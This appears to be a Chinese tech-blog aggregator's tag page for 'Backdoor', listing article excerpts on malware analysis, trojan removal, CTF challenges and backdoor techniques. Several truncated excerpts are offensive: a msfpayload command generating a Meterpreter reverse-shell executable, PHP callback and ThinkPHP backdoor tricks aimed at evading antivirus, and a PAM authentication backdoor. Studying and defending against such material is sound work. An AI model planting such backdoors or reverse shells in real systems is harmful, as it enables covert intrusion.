Backdoor

创造tips的秘籍——PHP回调后门

作者:Phithon原文连接:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数
Hookjoy·2015-11-18 05:00

ThinkPHP留后门技巧

原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html90sec上有人问,我说了还有小白不会用。
Hookjoy·2015-11-18 05:00

“史上最强Android木马”现身?360手机安全专家全面剖析

该恶意程序被称为“Backdoor.AndroidOS.Obad.a”,其恶意行为是通过悄悄向增值服务号码发送短信获利。
·2015-11-13 08:36

SYMANTEC病毒误报现象处理(Backdoor.haxdoor临时解决方案)

  诺顿升级到5月17日版本后,会导致打过KB924270补丁的XP系统崩溃,其原因是诺顿将KB924270更新过的netapi32.dll和lsasrv.dll文件误报为Backdoor.Haxdoor
·2015-11-12 22:05

手工清除鸽子

灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。
·2015-11-12 17:44

分享一个c++ 加密算法 ,在百度贴吧找的,比较好玩

//benny-crypt#include <iostream>#include <cmath>void encrypt();void decrypt();void backdoor
·2015-11-11 19:10

Python——eventlet.backdoor

  eventlet.backdoor 是正在运行中的进程内的 Pyhon 交互解释器。   
·2015-11-11 01:11

灰鸽子病毒手工清除方法

 灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。
·2015-11-08 16:19

策略模式小记【原创】

    如上图,诸葛亮给了赵云三个妙计(BackDoor等),
·2015-11-02 11:52

WordPress Backdoor未授权访问漏洞和信息泄露漏洞

漏洞名称: WordPress Backdoor未授权访问漏洞和信息泄露漏洞 CNNVD编号: CNNVD-201312-497 发布时间: 2013-12-27 更新时间: 2013-12
·2015-11-02 10:39

【CTF】RE Backdoor CTF 2015 TEAM 600

来源: Backdoor CTF 2015 There is a wierd kind of authentication service running: nc hack.bckdr.in 8004
·2015-11-01 10:49

weevely-------linux中的菜刀

root@bt:/pentest/backdoors/web/weevely# .
·2015-11-01 08:05

Windows进程超级大全

absr.exe   进程文件: absr or absr.exe   进程名称: Backdoor.Autoupder Virus   描述: 这个进程是Backdoor.Autoupder后门
·2015-10-31 12:19

识别电脑病毒的基础知识

很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor.
·2015-10-31 11:18

【CTF】Reverse Backdoor 2015 Echo

来源: Backdoor CTF 2015 Little Suzie started learning C.
·2015-10-31 08:38

常见病毒 木马进程速查表

exe → Tryit       Mdm.exe → Doly 1.6-1.7 Aboutagirl.exe → 初恋情人   Microsoft.exe → 传奇密码使者 Absr.exe → Backdoor.Autoupder
·2015-10-30 13:31

常见程序进程

  absr.exe 进程文件: absr or absr.exe 进程名称: Backdoor.Autoupder Virus 描述: 这个进程是Backdoor.Autoupder后门病毒程序创建的
·2015-10-27 16:50

对linux下perl backdoor的一段分析

背景 一个朋友的服务器出现了一个莫名其妙的inetd 进程,开了 21000 端口,怀疑被入侵。登陆上去简单检查了一下,发现骇客不留神把后门的一个副本,遗留在临时目录下。经过检查是个用 perl 脚本写的后门。叫 Telnet-like Standard Daemon。后门找到了,入侵事件也基本被定性。 1. 目前主机上还运行着该后门,很有可能黑客已经通过编写启动脚本,将后门加入了随机启动。
·2015-10-27 14:37

Windows 3389 RDP BackDoor Deployment Hacking && Detection

catalog 1. 3389后门种类 2. shift后门部署 3. 数字签名 4. shift后门检测 5. 测试验证 6. shift后门防御策略   1. 3389后门种类 1. windows放大镜后门: %SystemRoot%\system32\magnify.exe 2. windows屏幕键盘后门: %SystemRoot%\system32\
·2015-10-26 15:11

Android设备管理器漏洞

一、漏洞描述          目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载
·2015-10-23 08:31

入门:从病毒命名识别病毒

在用杀毒软件查杀病毒的时候,经常会从自己的电脑中找出一些病毒,它们都有一串很长的名字,如Worm.Padobot.u、Backdoor.RBot.abc等,根本看不懂是什么意思,也不知道是一种什么病毒?
·2015-10-21 12:46

后门技巧

<++> backdoor/backdoor1.c #include main() { FILE *fd; fd=fopen("/etc
·2015-10-21 12:45

引用 病毒是怎么命名的?教你认识病毒命名规则

教你认识病毒命名规则 很多时候大家已经用各类安全软件、杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12、Trojan.Win32.SendIP.15等等这些一串英文还带数字的病毒名
·2015-10-21 12:11

vc++反向连接后门

;) void main(int argc,char **argv){char *messages = "/r/n======================== BackConnect BackDoor
·2015-10-21 11:15

虚拟机检测绕过总结--不定时更新

1.普遍的绕过方法:disable_acceleration="TRUE"monitor_control.restrict_backdoor="TRUE"isolation.tools.getPtrLocat
AZFU0BN·2015-09-22 10:30

WMI Backdoor 三好学生

0x00前言上篇介绍了如何通过powershell来实现WMIattacks,这次接着介绍一些进阶WMI技巧---WMIBackdoor配图为Mandiant在M-Trends2015报告中提到的“HowthreatactorsuseWMItomaintainpersistence
qq_27446553·2015-09-02 09:00

恶意程序Korplug利用IE浏览器漏洞盗取有价值信息及用户隐私

赛门铁克公司在对网站进行了远程检测之后发现,被入侵的网站中含有一个漏洞,这个漏洞允许攻击者使用Korplug木马后门(赛门铁克公司将其鉴定为Backdoor.Korplug)来感染该网站的访问者。
佚名·2015-08-20 16:18

Apache端口复用-模块rootme

Github->jingchunzhang->backdoor_rootkitpannisec.diandian.com/?
qq_27446553·2015-08-14 11:00

一次被入侵和删除木马程序的经历

一次被入侵和删除木马程序的经历首先剧透一下后门木马如下:(当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人)木马名称Linux.BackDoor.Gates.5http://forum.antichat.ru
minminmsn·2015-08-01 13:45

一次被入侵和删除木马程序的经历

一次被入侵和删除木马程序的经历首先剧透一下后门木马如下:(当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人)木马名称Linux.BackDoor.Gates.5http://forum.antichat.ru
minminmsn·2015-08-01 13:45

一次被***和删除***程序的经历

一次被***和删除***程序的经历首先剧透一下后门***如下:(当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人)***名称Linux.BackDoor.Gates.5http://forum.antichat.ru
三杯水·2015-08-01 13:45

分享一些无特征PHP一句话-20150719

少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
qq_27446553·2015-07-20 10:00

apache-shiro杂记(二) 关于多realm认证的策略

一直以为给定的下面配置是短路方式的,即defaultJdbcRealm可以成功认证,backDoorJdbcRealm就不会被调用。 
ajan·2015-05-24 16:46

apache-shiro杂记(二) 关于多realm认证的策略

一直以为给定的下面配置是短路方式的,即defaultJdbcRealm可以成功认证,backDoorJdbcRealm就不会被调用。 
ajan·2015-05-24 16:46

记一次linux系统中马后的处理(RHEL6.3、木马:Linux.BackDoor.Gates.5)

中马表现症状:机器拼命向外发包,耗尽网络流量。  于是查看网络连接使用netstat -antuple(这里第一步就错了,因为木马已经替换了些系统命令,包括netstat,请原谅我年幼无知) 有个222开头来自江苏的IP已经建立了连接这时可以临时救急,用iptables将来自和发往该IP的数据包DROP掉,iptables -I INPUT -s 222.186.30.203 -j DROPipt
Tobi·2014-12-03 16:46

the-backdoor-factory

参考:https://github.com/secretsquirrel/the-backdoor-factory貌似很有趣,值得深入了解了解安装过程1.easy_install wget"https
j4s0nh4ck·2014-11-27 01:00

赛门铁克、思科、FireEye、微软等公司联手对抗Hidden Lynx组织

F-Secure、iSIGHTPartners、微软、Tenable,ThreatConnect、ThreatTrackSecurity、Volexity、Novetta和赛门铁克进行跨行业合作共同对抗Backdoor.Hikit
流云飞逝·2014-10-18 00:02

赛门铁克、思科、FireEye、微软等公司联手对抗Hidden Lynx组织

F-Secure、iSIGHTPartners、微软、Tenable,ThreatConnect、ThreatTrackSecurity、Volexity、Novetta和赛门铁克进行跨行业合作共同对抗Backdoor.Hikit
流云飞逝·2014-10-18 00:02

Metasploit backdoor

攻击端:OS:KaliIP:192.168.111.129被害端:OS:Windowsserver2008(64位)IP:192.168.111.133首先在Kali上生成meterpreter的payloadroot@Kali:~#msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.111.129LPORT=2013X>file.exeC
dy0nGu1·2014-10-16 21:37

[译]查找后门shell

原文地址:http://resources.infosecinstitute.com/checking-out-backdoor-shells/一些上传webshell的方法1.本地文件包含漏洞-攻击者可以通过文件夹遍历特性
j4s0nh4ck·2014-10-13 23:00

Android设备管理器漏洞分析!

一、漏洞描述     目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。
科技创造·2014-10-13 11:00

全球1.7万台Mac电脑感染新恶意软件iWorm

俄罗斯信息安全研究公司Dr.Web在病毒库中将这一恶意软件标记为“Mac.BackDoor.iWorm”。这是一种复杂的后门软件,能在被感染的Mac电脑上执行多种命令,从而实现窃取用户数据,以
小猪猪的风·2014-10-10 15:00

[译]使用sql创建后门

原文地址:http://resources.infosecinstitute.com/backdoor-sql-injection/在读本文之前应该参考http://resources.infosecinstitute.com
j4s0nh4ck·2014-10-10 02:00

新恶意软件 iWorm 已感染全球1.7万台 Mac 电脑

俄罗斯信息安全研究公司Dr.Web在病毒库中将这一恶意软件标记为“Mac.BackDoor.iWorm”。这是一种复杂的后门软件,能在被感染的Mac电脑上执行多种命
·2014-10-04 00:00

Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理

Linux服务器被黑,向外疯狂发包,造成网络瘫痪,可用clamAV扫描,显示是LinuxUnix.Trojan.Elknot木马病毒(Linux.BackDoor.Gates.5),参考:http://
liukeforever·2014-08-14 17:00

策略模式

public void operate(); }   public class BackDoor implements IStrategy { @Override public
qq1013712290·2014-06-24 09:00

PHP后门隐藏与维持技巧

前言在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.以PHP-WEBBACKDOOR
DevilRex119·2014-05-23 16:50

防止vmware虚拟机被检测到

在vmx中添加monitor_control.restrict_backdoor="TRUE" isolation.tools.getPtrLocation.disable="TRUE" isolation.tools.setPtrLocation.disable
Sidyhe·2014-04-25 19:00

metaspliot一些练习

=====NameDisclosureDateRankDescription----------------------------------exploit/unix/ftp/vsftpd_234_backdoor2011
平_繁·2014-04-22 21:07

PAM模块的backdoor实现与分析

环境RHEL6.4wgethttp://www.linux-pam.org/library/Linux-PAM-1.1.1.tar.gztarxzvfLinux-PAM-1.1.1.tar.gz主要修改Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c/*verifythepasswordofthisuser*/ retval=_unix_verif
老徐_kevin·2014-04-14 12:39
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他